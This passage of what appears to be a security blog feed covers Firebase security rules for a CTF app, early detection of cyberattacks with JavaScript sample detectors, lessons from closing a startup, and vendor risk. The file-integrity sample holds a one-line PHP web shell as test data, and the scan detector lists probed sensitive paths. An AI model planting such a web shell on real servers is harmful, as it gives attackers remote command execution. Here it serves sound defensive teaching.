When reading data, the primary concern is to prevent anyone from getting access to the flag, as that would make it possible for them to cheat in the challenge. Security rules apply to documents, not to fields in a document. This means that we cannot store a “secret” inside a document; access is an all or nothing decision. However, we can create a subcollection within a document, and apply separate rules to that subcollection. We have thus created a data structure like this: 

screenshot of firestore data structure

Security rules are hierarchical, so we need to apply rules to /challenges/{challenge}/private/{document}/ to control access to “private”. Here we want the rules to allow only “create” a document under “private” but not to change it, and also not to read it. The purpose of blocking reading of the “private” documents is to avoid cheating. 

But how can we then compare a player’s suggested flag with the stored one? We can’t in the frontend, and that is the point. We don’t want to expose the data on the client side. 

Story 3: Serverless functions to the rescue

Because we don’t want to expose the flag from the private subcollection in the frontend, we need a different pattern here. We will use Firebase cloud functions to do that. This is similar to AWS Lambda functions, just running on GCP/Firebase instead. For our Firestore security, the important aspect is that a cloud function running in the same Firebase project has full access to everything in Firestore, and the security rules do not apply to the admin SDK used in functions. By default a cloud function is assigned an IAM role that gives it this access level. For improved security you can change the roles so that you allow only the access needed for each cloud function (here: read data from Firestore). We haven’t done that here, but this would allow us to improve security even further. 
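
The core of such a function can be sketched as follows. This is not the code used in the app: checkSubmission and loadStoredFlag are hypothetical names, and the Firestore read through the admin SDK is replaced by an in-memory stand-in so the sketch runs on its own in Node.js.

```javascript
const crypto = require("crypto");

// Compare a submitted flag with the stored one without leaking timing information.
// Hashing first gives both buffers the same length, which timingSafeEqual requires.
function flagsMatch(submittedFlag, storedFlag) {
  const a = crypto.createHash("sha256").update(String(submittedFlag)).digest();
  const b = crypto.createHash("sha256").update(String(storedFlag)).digest();
  return crypto.timingSafeEqual(a, b);
}

// Hypothetical handler body: `loadStoredFlag` stands in for a read from the
// private subcollection using the admin SDK, which security rules do not restrict.
async function checkSubmission(challengeId, submittedFlag, loadStoredFlag) {
  const storedFlag = await loadStoredFlag(challengeId);
  // Only a boolean is returned to the client, never the flag itself.
  return { correct: flagsMatch(submittedFlag, storedFlag) };
}

// Usage with an in-memory stand-in for Firestore (made-up challenge id and flag)
const fakeStore = { fog: "flag{on-the-water}" };
const loader = async (id) => fakeStore[id];

checkSubmission("fog", "flag{on-the-water}", loader).then((r) => console.log(r));
checkSubmission("fog", "flag{wrong}", loader).then((r) => console.log(r));
```

The point of the design is that the client only ever learns whether the guess was correct; the stored flag never leaves the backend.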

Serverless security engineering recap

Applications don’t magically secure themselves in the cloud, or by using serverless. With serverless computing, we are leaving all the infrastructure security to the cloud provider, but we still need to take care of our workload security. 

In this post we looked at access control for the database part of a simple serverless web application. The authorization is implemented using security rules. These rules can be made very detailed, but it is important to test them thoroughly. Misconfigured security rules can suddenly allow an attacker to bypass your intended control. 

Using Firebase, it is not obvious from the Firebase Console how to set up good application security monitoring and logging. Of course, that is equally important when using serverless as with other types of infrastructure, both for detecting attacks, and for forensics after a successful breach. You can set up Google Cloud Monitoring for Firebase resources, including alerts for events you want to react to. 

As always: basic security principles still hold with serverless computing!

How to discover cyberattacks in time to avoid disaster

Without IT systems, modern life does not exist. Whether we are turning on our dishwasher, ordering food, working, watching a movie or even just turning the lights on, we are using computers and networked services. The connection of everything in networks brings a lot of benefits – but can also make the infrastructure of modern societies very fragile.

Bus stop with networked information boards
Cyber attacks can make society stop. That’s why we need to stop the attackers early in the kill-chain!

When society moved online, so did crime. We hear a lot about nation state attacks, industrial espionage and cyber warfare, but for most of us, the biggest threat is from criminals trying to make money through theft, extortion and fraud. The difference from earlier times is that we are not only exposed to “neighborhood crime”; through the Internet we are exposed to criminal activities executed by criminals anywhere on the planet. 

We see in media reports every week that organizations are attacked. These attacks cause serious disruptions, and the cost can be very high. Over Christmas we had several attacks happening in Norway that had real consequences for many people: 

  • Nortura, a cooperative owned by Norwegian farmers that processes meat and eggs, was hit by a cyber attack that made them take many systems offline. Farmers could not deliver animals for slaughtering, and distribution of meat products to stores was halted. This is still the situation on 2 January 2022, and the attack was made public on 21 December 2021. 
  • Amedia, a media group publishing mostly local newspapers, was hit with ransomware. The next 3 days following the attack on the 28th of December, most of Amedia’s print publications did not come out. They managed to publish some print publications through collaboration with other media houses. 
  • Nordland fylkeskommune (a “fylkeskommune” is a regional administrative level between municipalities and the central government in Norway) was hit with an attack on 23 December 2021. Several computer systems used by the educational sector have been taken offline, according to media reports. 

None of the attacks mentioned above have been linked to the log4shell chaos just before Christmas. The Amedia incident has been linked to the PrintNightmare vulnerability that caused panic earlier in 2021. 

What is clear is that there is a serious and very real threat to companies from cyber attacks – affecting not only the companies directly, but entire supply chains. The three attacks mentioned above all happened within two weeks. They caused disruption of people’s work, education and media consumption. When society is this dependent on IT systems, attacks like these have real consequences, not only financially, but to quality of life.

This blog post is about how we can improve our chances of detecting attacks before data is exfiltrated, before data is encrypted, before supply chains collapse and consumers get angry. We are not discussing what actions to take when you detect the attack, but we will assume you already have an incident response plan in place.

How an attack works and what you can detect

Let’s first look at a common model for cyber attacks that fits quite well with how ransomware operators execute: the cyber kill-chain. An attacker has to go through certain phases to succeed with an attack. The kill-chain model uses 7 phases. A real attack will jump a bit back and forth throughout the kill-chain, but for discussing what happens during the attack, it is a useful mental model. In the table below, the phases marked in yellow will often produce detectable artefacts that can trigger incident response activities. The blue phases of weaponization (usually not detectable) and command & control and actions on objectives (too late for early response) are not discussed further. 

Defensive thinking using a multi-phase attack model should take into account that the earlier you can detect an attack, the more likely you are to avoid the most negative consequences. At the same time, the earlier phases give you detections with more uncertainty, so you do risk initiating response activities that can hurt performance based on false positives. 

Detecting reconnaissance

Before the attack happens, the attacker will identify the victim. For some attacks this is completely automated but serious ransomware attacks are typically human directed and will involve some human decision making. In any case, the attacker will need to know some things about your company to attack it. 

  • What domain names and URLs exist?
  • What technologies are used, preferably with version numbers so that we can identify potential vulnerabilities to exploit?
  • Who are the people working there, what access levels do they have and what are their email addresses? This can be used for social engineering attacks, e.g. delivering malicious payloads over email. 

These activities are often difficult to detect. Port scans and vulnerability scans of internet exposed infrastructure are likely to drown in a high number of automated scans. Most of these are happening all the time and not worth spending time reacting to. However, if you see unusual payloads attempted, more thorough scans, or very targeted scans on specific systems, this can be a signal that an attacker is footprinting a target. 
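
One way to separate thorough scans from background noise can be sketched as below. The log record format, the function name findThoroughScanners and the threshold are assumptions made for illustration; a real detection would run on your own access logs and be tuned to your traffic.

```javascript
// Each entry is a simplified, hypothetical access-log record.
// Flags source IPs that probe many distinct paths that do not exist (HTTP 404).
function findThoroughScanners(entries, minDistinctPaths = 4) {
  const pathsByIp = new Map();
  for (const { ip, path, status } of entries) {
    if (status !== 404) continue; // only count probes for missing paths
    if (!pathsByIp.has(ip)) pathsByIp.set(ip, new Set());
    pathsByIp.get(ip).add(path);
  }
  return [...pathsByIp]
    .filter(([, paths]) => paths.size >= minDistinctPaths)
    .map(([ip, paths]) => ({ ip, distinctMissingPaths: paths.size }));
}

// Made-up sample data using documentation IP ranges
const sampleLog = [
  { ip: "203.0.113.7", path: "/admin", status: 404 },
  { ip: "203.0.113.7", path: "/wp-login.php", status: 404 },
  { ip: "203.0.113.7", path: "/.env", status: 404 },
  { ip: "203.0.113.7", path: "/backup.zip", status: 404 },
  { ip: "203.0.113.7", path: "/", status: 200 },
  { ip: "198.51.100.2", path: "/favicon.ico", status: 404 },
  { ip: "198.51.100.2", path: "/", status: 200 },
];

const scanners = findThoroughScanners(sampleLog);
console.log(scanners);
```

Counting distinct missing paths rather than raw request volume keeps a busy but legitimate client from being flagged.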

Other information useful to assess the risk of an imminent attack would be news about attacks on other companies in the same business sector, or in the same value chain. Also attacks on companies using similar technical set-ups (software solutions, infrastructure providers, etc) could be an early warning signal. In this case, it would be useful to prepare a list of “indicators of compromise” based on those news reports to use for threat hunting, or simply creating new alerts in monitoring systems. 

Another common indicator that footprinting is taking place, is an increase in the number of social engineering attempts to elicit information. This can be over phone, email, privacy requests, responses to job ads, or even in person. If such requests seem unusual it would be useful for security if people would report it so that trends or changes in frequency can be detected. 

Detecting delivery of malicious payloads

If you can detect that a malicious payload is being delivered you are in a good position to stop the attack early enough to avoid large scale damage. The obvious detections would include spam filters, antivirus alerts and user reports. The most common initial intrusion attack vectors include the following: 

  • Phishing emails (by far the most common)
  • Brute-force attacks on exposed systems with weak authentication systems
  • Exploitation of vulnerable systems exposed to the Internet

Phishing is by far the most common attack vector. If you can reliably detect and stop phishing attacks, you are reducing your risk level significantly. Phishing attacks usually take one of the following forms: 

  • Phishing for credentials. This can be username/password based single-factor authentication, but also systems protected by MFA can be attacked with easy to use phishing kits. 
  • Delivery of attachments with malicious macros, typically Microsoft Office. 
  • Other types of attachments with executable code, that the user is instructed to execute in some way

Phishing attacks create a number of artefacts. The first come from spam filters and endpoint protection; the attacker may need several attempts to get the payload past the first line of defence. If there is an increase in phishing detections from automated systems, be prepared for other attacks to slip past the filters. 

The next reliable detection is a well-trained workforce. If people are trained to report social engineering attempts and there is an easy way to do this, user reports can be a very good indicator of attacks. 

For brute-force attacks, the priority should be to avoid exposing vulnerable systems. In addition, creating alerts on brute-force type attacks on all exposed interfaces would be a good idea. It is then especially important to create alerts on successful attempts. 
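
A detection for a successful login following a run of failures could look roughly like this. The event format, the function name findSuccessAfterFailures and the threshold of three failures are assumptions for the sketch, not a recommendation for a specific product.

```javascript
// Hypothetical, simplified authentication events in chronological order.
// Raises an alert when a login succeeds after `threshold` or more consecutive failures.
function findSuccessAfterFailures(events, threshold = 3) {
  const failures = new Map(); // key: "source|user" -> consecutive failure count
  const alerts = [];
  for (const { source, user, success } of events) {
    const key = `${source}|${user}`;
    const count = failures.get(key) || 0;
    if (success) {
      if (count >= threshold) alerts.push({ source, user, failuresBefore: count });
      failures.set(key, 0); // reset after any successful login
    } else {
      failures.set(key, count + 1);
    }
  }
  return alerts;
}

// Made-up sample events
const authEvents = [
  { source: "203.0.113.9", user: "donkeyman", success: false },
  { source: "203.0.113.9", user: "donkeyman", success: false },
  { source: "203.0.113.9", user: "donkeyman", success: false },
  { source: "203.0.113.9", user: "donkeyman", success: true },
  { source: "198.51.100.4", user: "alice", success: false },
  { source: "198.51.100.4", user: "alice", success: true },
];

const bruteForceAlerts = findSuccessAfterFailures(authEvents);
console.log(bruteForceAlerts);
```

A single mistyped password followed by a success stays below the threshold, so ordinary users do not trigger the alert.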

For web applications, both application logs and WAF (web application firewall) logs can be useful. The main problem is again to recognize the attacks you need to worry about in all the noise from automated scans. 

Detecting exploitation of vulnerabilities

Attackers are very interested in vulnerabilities that give them access to “arbitrary code execution”, as well as “escalation of privileges”. Such vulnerabilities will allow the attacker to install malware and other tools on the computer targeted, and take full control over it. The primary security control to avoid this, is good asset management and patch management. Most attacks are exploiting vulnerabilities where a patch exists. This works because many organizations are quite late at patching systems. 

A primary defense against exploitation of known vulnerabilities is endpoint protection systems, including anti-virus. Payloads that exploit the vulnerabilities are recognized by security companies and signatures are pushed to antivirus systems. Such detections should thus be treated as serious threat detections. It is all well and good that Server A was running antivirus that stopped the attack, but what if virus definitions were out of date on Server B?

Another important detection source here would be the system’s audit logs. Did the exploitation create any unusual processes? Did it create files? Did it change permissions on a folder? Log events like this should be forwarded to a tamper proof location using a suitable log forwarding solution. 

To detect exploitation based on log collection, you will be most successful if you focus on known vulnerabilities where you can establish recognizable patterns. For example, if you know you have vulnerable systems that cannot be patched for some reason, establishing specific detections for exploitation can be very valuable. For tips on log forwarding for intrusion detection in Windows, Microsoft has issued specific policy recommendations here.

Detecting installation (persistence)

Detecting installation for persistence is usually quite easy using native audit logs. Whenever a new service is created, a scheduled task is created, or a cron job, an audit log entry should be made. Make sure this is configured across all assets. Other automated execution patterns should also be audited, for example autorun keys in the Windows registry, or programs set to start automatically when a user logs in.

Another important aspect is to check for new user accounts on the system. Account creation should thus also be logged. 

On web servers, installation of web shells should be detected. Web shells can be hard to detect. Because of this, it is a good idea to monitor file integrity of the files on the server, so that a new or changed file would be detected. This can be done using endpoint protection systems.
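
The idea behind file integrity monitoring can be sketched in a few lines of Node.js. To keep the sketch self-contained, file contents are passed in as strings instead of being read from disk, and the paths and function names (buildBaseline, compareToBaseline) are hypothetical. A real deployment would rather rely on an endpoint protection or dedicated integrity monitoring tool.

```javascript
const crypto = require("crypto");

// SHA-256 fingerprint of a file's content
function hashContent(content) {
  return crypto.createHash("sha256").update(content).digest("hex");
}

// files: object mapping path -> content (in practice read from disk)
function buildBaseline(files) {
  const baseline = {};
  for (const [path, content] of Object.entries(files)) {
    baseline[path] = hashContent(content);
  }
  return baseline;
}

// Report files that were added, modified or removed since the baseline was taken
function compareToBaseline(baseline, files) {
  const current = buildBaseline(files);
  const findings = [];
  for (const path of Object.keys(current)) {
    if (!(path in baseline)) findings.push({ path, change: "added" });
    else if (baseline[path] !== current[path]) findings.push({ path, change: "modified" });
  }
  for (const path of Object.keys(baseline)) {
    if (!(path in current)) findings.push({ path, change: "removed" });
  }
  return findings;
}

// Made-up web root before and after a web shell is dropped
const before = { "/var/www/index.php": "<?php echo 'hello'; ?>" };
const after = {
  "/var/www/index.php": "<?php echo 'hello'; ?>",
  "/var/www/uploads/shell.php": "<?php system($_GET['c']); ?>",
};

const integrityFindings = compareToBaseline(buildBaseline(before), after);
console.log(integrityFindings);
```

The baseline itself should be stored somewhere the web server cannot write to, otherwise an attacker can simply update it.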

How can we use these logs to stop attackers?

Detecting attackers will not help you unless you take action. You need to have an incident response plan with relevant playbooks for handling detections. This post is already long enough, but just like the attack, you can look at the incident response plan as a multi-phase activity. The plan should cover: 

  1. Preparations (such as setting up logs and making responsibilities clear)
  2. Detection (how to detect)
  3. Analysis and triage (how to classify detections into incidents, and to trigger a formal response, securing forensic evidence)
  4. Containment (stop the spread, limit the blast radius)
  5. Eradication (remove the infection)
  6. Recovery (recover the systems, test the recovery)
  7. Lessons learned (how to improve response capability for the next attack, who should we share it with)

You want to know how to deal with the data you have collected to decide whether this is a problem or not, and what to do next. Depending on the access you have on endpoints and whether production disturbances during incident response are acceptable, you can automate part of the response. 

The most important takeaway is:

Set up enough sensors to detect attacks early. Plan what to do when attacks are detected, and document it. Perform training exercises on simulated attacks, even if it is only tabletop exercises. This will put you in a much better position to avoid disaster when the bad guys attack! 

Things I learned from starting – and shutting down – a company

In 2016 I worked as a business development manager at Lloyd’s Register‘s consulting unit in Norway. We were building up a new service within industrial cybersecurity, and had a few good people on the team. We had great plans but then difficult times in the oil and gas sector started to cause problems for us. The order books were close to empty and the company started offering severance packages. We lost two key resources for our cybersecurity project, and internal funding for “future growth” was hard to obtain in this economic climate. That was the birth of the company Cybehave.

Starting a company with little sense of direction

We started Cybehave first as a development project where we wanted to automate cybersecurity risk assessment, to make such services available to smaller companies. We got seed funding from Innovation Norway – called “markedsavklaringsstøtte” (Norwegian for “market validation grant”), about NOK 85.000. We also got a free workplace for a while at a startup incubator while establishing a “minimum viable product”. A key problem was that we didn’t really know what was a viable product, or who the customers were. We were searching for pilot customers, looking at small and medium sized businesses. All our real-world sales experience, however, was from LR. We were used to working with global energy companies, government agencies and international manufacturing organizations. The contacts we had, and the typical way to initiate conversations in that space, were irrelevant in the SMB space. So we were to a large degree guessing what those SMBs would need in terms of security, and had problems agreeing between ourselves on what exactly our value proposition was. While doing this, our laid-off PhD level expert in risk management was building a minimum viable product by coding up a web application in Django/Python.

Without a clear understanding of your market, it is hard to know what to focus on.

We did focus groups, where we invited companies from many sectors. We got little useful feedback. We visited a lot of companies, trying to convince them that they needed cybersecurity risk management and awareness training. They were not particularly interested, and our message was perhaps not very clear either.

Before you invest a lot of time (and money) in your product, know who the customer is, and what problem you are solving for them. If you don’t know, spend time searching for a problem to solve instead of a customer who has the problem you have imagined must be important to others.

Without money, life is hard

Still without customers, we wanted to sell our great approach to human centric cybersecurity. We were thinking that “we don’t have customers because we don’t have money for marketing”. Because of this, we wanted to bring an investor on board. One of the co-founders focused a lot on this, but finding an investor who is interested without customers and cash flow, and without a very clear value proposition was difficult, for some reason. Here’s what we learned:

  • Local angel investors want a lot for equity without contributing much money. They have limited networks and understanding of B2B markets.
  • Pitching in start-up events requires a really good story. B2C stories tend to win over B2B stories, at least if your story isn’t particularly exciting.
  • Financial estimates have very little value in the early phase. They are mostly baseless guesstimates, sprinkled with wishful thinking.
  • Professional investors give a lot of very useful feedback. Talk to investment funds even if you are not in a place where you would be a good investment. You learn how they think and what they are looking for: clarity of benefit provided, growth potential, intellectual property rights, and capabilities of the management team/founders.

End of story: we did not get any external investment. The story was a bit too vague to compete with B2C for small-scale investors, we were too greedy to say “yes” to the offers we did get because they meant giving away too much ownership, and we were too early to be interesting to equity funds.

We went to the government again – Innovation Norway. They granted us a “commercialisation grant” of NOK 450.000. We received the first pay-out early 2019, 50% of the grant. That process was not without effort, but a better story to tell, a better plan, and a working prototype to demonstrate part of what we wanted to do were enough to get that money. And it was a nice grant because we did not have to give away equity – although the amount of money was not anywhere close to what we wanted to get sufficient growth. Because of this, and our not so successful attempts at getting investors on board, we switched to the strategy of getting funding the old-fashioned way: through positive cash flow.

Because the company was not making money, and we did not have any serious funding in place, nobody was working on the project full-time. We all had day jobs, and demanding day jobs at that, such as building up a security team at a global IT company and leading a department at a regional hospital. This further hampered product development.

You need a realistic funding plan from the beginning. Think through what you want from an external investor (money – or network, operational experience, support in addition) and how much of the equity (and control) you are willing to part with.

We did not want to make money by selling consulting hours. We wanted to build a scalable alternative. However, to provide cash flow to the company, we decided to start doing some consulting. Doing that on top of a day job that had to be followed up did not leave much time for building those scalable services!

Create a realistic plan for input resources, whether time or money. A full-time job on top of consulting to bring in money for development is not a sustainable model.

Administration requires work too

It is easy to focus on the customer, the big ideas, developing software (more about that later). But if you don’t keep up with administrative needs, there will be problems.

Accounting is important. There are many software companies selling “do-it-yourself” accounting solutions. Unless you enjoy accounting and actually know what you are doing, avoid the DIY solutions. It is hard to know which account to use for a certain expense, and which services bought outside the country should be reported for VAT. You could spend time learning all this, but unless that is your core business or you enjoy the details of accounting, get help. Top three accounting tips must be:

  • Engage an accountant.
  • Set up integrations between your bank accounts and your accounting system.
  • Use the accounting data to keep track of your company’s finances. Set up dashboards or reports that make sense to you. As a bare minimum you should get monthly statements on cash flow, liquidity and expenses in key categories (e.g. cloud computing, travel, salary).

In addition to accounting you will need to report regularly to the government. In Norway you will have to create a VAT tax report every other month. Failing to report on time will cause trouble – or fines from the tax authorities. This job is definitely best left to an accountant again! The same goes for the annual accounts and shareholder registry if your company is a limited company with shares.

Get an accountant, and set up bank integration solutions and automation as early as you can. This will free up a lot of time and worry so you can focus on building your company.

A successful product: PrivacyBox

In 2018 I worked at Sportradar as my full-time day job. There I met the data protection officer, newly hired, who was trying to get this multinational company in shape for the GDPR. Together we created an internal tool for a personal data inventory solution. We also saw that there were a lot of challenges related to management of requests from data subjects. The most common solution was to publish an e-mail address on the privacy policy page where people could submit requests for access to data, deletion or other rights they want to exercise under the GDPR or other policies. We agreed to take my colleague from Sportradar on as a shareholder in Cybehave and to develop a good solution for handling privacy rights. The counterpart at Sportradar was the head of legal, to avoid conflicts of interest. Sportradar would be a pilot customer, with free access the first months (before the product was actually very usable) as long as we got feedback on the software. Then they would get a discount for some time before the price goes up to the market price.

This gave us a very different situation from the security awareness and risk solution: someone with actual use for the product who could tell us what they needed. It was mainly I who developed the first version of this software, as a prototype. We got a lot of great features in, and the customer was happy with the product. It was in use by Sportradar globally across all their brands from 2019 to 31 December 2021. They had to switch vendor because Cybehave is being dissolved but they were happy with the solution.

  • Have a pilot customer before you write any type of code
  • The pilot customer should have a clear need to satisfy and opinions on how the system should work
  • The pilot customer should have sufficient volume of work to be done in the software that you get real-world experience and feedback

In addition to the help we got from the clear feedback from the pilot customer, we quickly learned a few other things:

  • Create great end-user documentation that tells users how to accomplish tasks.
  • For “one-time users” such as data subjects making requests, make filling in the form as quick and easy as possible
  • Solutions that filter spam are important when publishing forms online on pages with high-volume traffic. An e-mail with a confirmation link is a simple and effective solution for this.
  • Application logging is extremely important for troubleshooting and customer support requests
  • Be prepared to answer customer support requests quickly. Keeping the customer happy means making sure they can get their work done, even when the software solution has a bug or is missing a feature

Work closely with a pilot customer to create a product that actually solves a problem. Remember that documentation, logging and support are essential parts of the service offering!

Don’t develop software alone

Cybehave was a company without full-time employees. In fact, most of the time it did not have any employees at all. In the beginning, the first prototype of a SaaS software was created by the colleague that was let go from LR. She was a brilliant risk analyst, and great at scientific computing. That does not make you a software engineer. The majority, however, was written by me. The other two co-founders were non-technical and did not write code. Not sure I am brilliant at anything, but I am also not a software engineer by education. I did, however, learn a great deal from the Cybehave project, as well as from working at Sportradar. Key take-aways for the next time:

  1. Don’t write software alone. It is too much work and too easy to make serious mistakes leading to vulnerabilities and nasty bugs.
  2. Spend more time thinking about architecture and design patterns than actually writing code.
  3. Iterate. When your new feature works, it is not done. Work on it until it becomes good – think about and measure performance, reliability, user experience. And most of all: get outside feedback on how well it works – it will all be easy to you, since you created it!
  4. Test. Because of the lack of formal software engineering background and a focus on “creating the things” as a one-man show, not much testing was done when writing Cybehave’s software. Testing is extremely important for both performance and security.
  5. Don’t create features the customer does not need. All software will need to be maintained; the less code you have, the less interest there will be to pay on the technical debt.

For PrivacyBox we sometimes needed to improve features or add new ones. At one point, we decided to hire a freelancer to do some improvements. That freelancer was a professional software engineer who was not necessarily cheap per hour, but created high-quality code, improved architecture and provided very helpful feedback on technical details. If your team does not have the competence needed and you cannot afford to hire someone, contract with good freelancers for specific tasks and make sure to work closely with them.

Automation and Git hygiene provide a lot of value

You should not make software development a solo project, and testing is important. If you are a non-technical founder but your company makes software, make sure to talk to your technical team about how to ensure good quality of the software you produce. Even with a small team, or with freelancers on board for specific features, you will gain a lot by setting up automated tests and build pipelines. This will reduce the number of bugs and provide help to build better software.

  • Set up at least three branches in Git: development, test, production
  • Push often to development to make sure you do not lose work
  • Use feature branches that will merge to development
  • Merge to test branch should automatically run important tests. Those should include static analysis and software component analysis as a minimum. You should also have unit tests and integration tests running in a software test suite. If tests fail, you should not be able to merge the branch into production.
  • When you merge to production, your pipeline should automatically push the changes to the production servers. Most likely you will be running your software on public cloud infrastructure. Public cloud providers will typically have good documentation available for how to set up CI/CD pipelines.

Application security bare minimum practices

Nothing will erode your customer’s trust as fast as a compromised software solution. Security is business critical, not only to you but also to your customer. Because of this, you should make sure that the software you create follows some key practices.

  1. Ensure identity and authorization management is properly implemented. Use single sign-on solutions for B2B interactions when possible. If you implement your own authentication and authorization system, make sure passwords are strong enough, hashed and salted, and that multifactor authentication is available and possibly required.
  2. Log all security events and create alerts for unexpected events. Important events include authentication, password change, privilege escalation (if multiple authorization levels exist), user creation, unauthorized access/transaction attempts, all privileged access/transactions. In addition, there may be context specific events that are important to track, such as data deletion, data sharing, etc.
  3. Ensure input validation is applied for all user generated input. This also applies to responses from third-party API’s.
  4. Make sure there are no secrets in your code. Secrets should be injected at run-time and be possible to rotate.
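
Two of the practices above, salted password hashing and run-time injection of secrets, can be sketched with Node.js built-ins. This is an illustration under assumptions, not the code used in Cybehave’s products: the function names and the storage format are made up, the secret name passed to getSecret is up to you, and in many cases a managed identity provider is a better choice than rolling your own authentication.

```javascript
const crypto = require("crypto");

// Hash a password with a random per-user salt using scrypt.
// Stored format "salt:hash" (hex) is an assumption for this sketch.
function hashPassword(password) {
  const salt = crypto.randomBytes(16);
  const hash = crypto.scryptSync(password, salt, 64);
  return `${salt.toString("hex")}:${hash.toString("hex")}`;
}

// Recompute the hash with the stored salt and compare in constant time.
function verifyPassword(password, stored) {
  const [saltHex, hashHex] = stored.split(":");
  const expected = Buffer.from(hashHex, "hex");
  const actual = crypto.scryptSync(password, Buffer.from(saltHex, "hex"), expected.length);
  return crypto.timingSafeEqual(actual, expected);
}

// Read a secret injected at run-time through the environment instead of
// hard-coding it. Fails loudly if the secret is missing.
function getSecret(name) {
  const value = process.env[name];
  if (!value) throw new Error(`Missing secret: ${name}`);
  return value;
}

const record = hashPassword("correct horse battery staple");
console.log(verifyPassword("correct horse battery staple", record)); // true
console.log(verifyPassword("wrong password", record));               // false
```

Because the secret is read from the environment at start-up, rotating it only requires updating the deployment configuration, not the code.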

Follow good software engineering practices from the start. If you don’t, you will get a lot of technical debt, which means there will be so much maintenance to do that you will never catch up.

Lessons from shutting it down

So, Cybehave came to an end. Closing down a software company means shutting down a lot of services. It would have been much easier to do this if we had kept an inventory of all the online services and software solutions we were using. When we started shutting down our operations, we had to create this inventory. Here are some categories of services we were using:

  • Transactional mail providers
  • Cloud services (we were running on Google cloud IaaS and PaaS solutions)
  • Office/collaboration software
  • CRM and marketing solutions
  • Github organization with private and public repositories
  • Accounting software
  • Mobile apps from banks, etc.

Just keeping track of the online accounts and services used in a spreadsheet would be a great help. I noticed that we had accounts with many SaaS providers that we were not using; we had simply tried them out and left the accounts active when abandoning them. With a cloud software inventory and a practice to shut down unused accounts we would not only make it easier to shut down the company, we would also have reduced our attack surface.
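
A spreadsheet is enough, but the same idea can be sketched in a few lines of Python. The field names, the example entries and the 90-day idle threshold below are all hypothetical and chosen only for illustration.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import List


@dataclass
class ServiceAccount:
    name: str        # e.g. the SaaS product name
    category: str    # e.g. "CRM", "Cloud", "Accounting"
    owner: str       # who in the company is responsible for the account
    last_used: date  # last time anyone actually used the service


def unused_accounts(
    accounts: List[ServiceAccount], today: date, max_idle_days: int = 90
) -> List[ServiceAccount]:
    """Return accounts that have been idle longer than max_idle_days."""
    cutoff = today - timedelta(days=max_idle_days)
    return [account for account in accounts if account.last_used < cutoff]


# Hypothetical inventory entries, for illustration only.
inventory = [
    ServiceAccount("example-mailer", "Transactional mail", "alice", date(2021, 11, 30)),
    ServiceAccount("example-crm-trial", "CRM", "bob", date(2020, 3, 1)),
]

for account in unused_accounts(inventory, today=date(2021, 12, 31)):
    print(f"Candidate for shutdown: {account.name} (owner: {account.owner})")
```

Running a check like this a few times a year gives you a short list of accounts to close, which is the practice that would have reduced our attack surface.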

Shutting down a company also means reporting this to the authorities. We got good help from our accountant in doing this, which takes away the uncertainty about what is required.

Telling our customers has also been important, of course. This should be done in good time, so the customers can transfer data and systems to new solutions if your products are being discontinued. We see that this requires a bit of support time and extra engineering effort to create good data transfer solutions. Factoring in the time to do this is important so that no bridges are burned and contractual obligations are met.

If you are shutting down your company, set aside enough time for technical shutdowns, mandatory reporting, and most importantly, taking care of your business relationships.

Postludium

Cybehave has been a great journey, and the company was actually profitable most years. Most of the cash flow came from consulting, where we have had the privilege of helping software companies, healthcare authorities, municipalities and construction companies. As much as I enjoy creating software, working directly with customers to create value and improve security is the real motivator. Today I am back in a great company where I can do this every day – with real positive impact.

Talking to fund managers and potential customers, even when it never resulted in investments or sales, has also been interesting. Start-up life is full of contrasts: one day we were sitting in a meeting with the top management of a multinational engineering company, and the next day we were meeting a potential customer where all 6 employees shared one office filled with cardboard boxes and laptops on the floor. It is rewarding but also tiring. But without sufficient financial muscle, the impact you want to make will remain a dream.

Although leaving a project you have put thousands of hours into will inevitably make you feel a bit melancholic, the future is bright, exciting and fast paced!

Happy new year – cybersecurity is still the main focus for 2022. Working to keep the lights on, hospitals running and supply chains safe from hackers.

My new project is working for DNV Cybersecurity, where we are building the world’s best industrial cybersecurity provider within DNV’s Accelerator. DNV’s purpose is to safeguard life, property and the environment – which is very close to my heart. DNV Cybersecurity has recently joined forces with Applied Risk, and this is only the beginning. I am therefore looking forward to making an impact together with great colleagues at DNV, where fast growth will allow us to bring the best security solutions for the real world to more customers around the world, defending hospitals, the power grid, shipping, food supply chains and the energy markets from hackers also in 2022.

Happy new year to all of you!

Vendor Security Management: how to decide if tech is safe (enough) to use

tl;dr: Miessler is right. We need to focus on our own risk exposure, not vendor security questionnaires

If you want to make a cybersecurity expert shiver, utter the words “supply chain vulnerabilities”. Everything we do today depends on a complex mixture of systems, companies, technologies and individuals. Any part of that chain of interconnected parts can be the dreaded weakest link. If hackers can find that weak link, the whole house of cards comes tumbling down. Managing cyber supply chain risk is challenging, to say the least.

Most companies that have implemented a vendor cybersecurity risk process, will make decisions based on a questionnaire sent to the vendor during selection. In addition, audit reports for recognized standards such as ISO 27001, or SOC2, may be shared by the company and used to assess the risk. Is this process effective at stopping cyberattacks through third parties? That is at least up for debate.

Daniel Miessler recently wrote a blog post titled It’s time for vendor security 2.0, where he argues that the current approach is not effective, and that we need to change the way we manage vendor risks. Considering how many cybersecurity questionnaires Equifax, British Airways and Codecov must have filled in before being breached, it is not hard to agree with @danielmiessler about this. What he argues in his blog is: 

  1. Cybersecurity reputation services (rating companies, etc.) mostly operate like the mob, and security questionnaires are mostly security theater. None of this will save you from cyber armageddon.
  2. Stay away from companies that seem extremely immature in terms of security
  3. Assume the vendor is breached
  4. Focus more on risk assessment under the assumption that the vendor is breached than questionable questionnaires. Build threat models and mitigation plans, make those risks visible. 

Will Miessler’s security 2.0 improve things?

Let’s pick at the 4 numbered points above one by one. 

Are rating companies mobsters? 

There are many cybersecurity rating companies out there. They see themselves as the Moody’s or S&P of cybersecurity. The way they operate is that they pull in “open source information about cybersecurity posture” of companies. They also say that they enrich this information with other data that only they have access to (that is, they buy data from marketing information brokers and exchange data with insurance companies). Then they correlate this information in more or less sound statistical ways (combined with a good dose of something called expert judgment – or guessing, as we can also call it) with known data breaches and create a security score. Then they claim that using companies with a bad score is dangerous, and that using companies with a good score is much better.

This is definitely not an exact science, but it does seem reasonable to assume that companies that show a lot of poor practice such as a lack of patching, botnet infected computers pinging out to sinkholes and so on, have worse security management than similar companies that do not have these indicators. Personally, I think a service like this can help sort the terrible ones from the reasonably OK ones. 

